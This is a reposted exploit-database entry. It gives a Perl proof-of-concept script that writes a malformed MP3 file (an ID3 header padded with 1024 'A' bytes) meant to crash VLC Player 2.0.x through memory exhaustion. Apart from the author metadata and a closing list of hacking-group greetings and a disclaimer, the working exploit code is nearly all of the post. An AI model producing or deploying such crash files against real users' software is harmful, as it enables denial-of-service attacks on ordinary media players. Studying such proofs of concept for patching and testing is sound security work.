Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

VLC Player 2.0.x (.mp3)

$
0
0
###
# Title : VLC Player 2.0.x (.mp3) <= Memory Exhaust P.o.C
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : windows - Dos/Poc
# Type : windows - proof of concept - local
# Tested on : Windows7 (Fr)
# Vendor : [http://www.videolan.org/vlc/]
###

#!/usr/bin/perl

my $badmp3 ="\x49\x44\x33\x04\x00\x00\x00\x00\x00".
"\x16\x54\x45\x4E\x43\x00\x00\x00\x0C".
"\x00\x00\x03\x4C\x61\x76\x66\x35\x31".
"\x2E\x31\x32\x2E\x31\xFF\xFB\x1D\x64".
"\x00\x0F\xF0\x00\x00\x69\x00\x00\x00".
"\x08\x00\x00\n".
"\x20\x00\x00\x01\x00\x00\x01\xA4\x00".
"\x00\x00\x20\x00\x00\x34\xFF\xFF\xFF".
"\x41" x 1024 ; # Buffer

open(K, ">", "p0c_k3d.mp3");
print K $badmp3;
close(K);

# Proof IMG : http://oi47.tinypic.com/98tx1f.jpg

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================





//The information contained within this publication is

//supplied "as-is"with no warranties or guarantees of fitness

//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information



Viewing all articles
Browse latest Browse all 8064

Trending Articles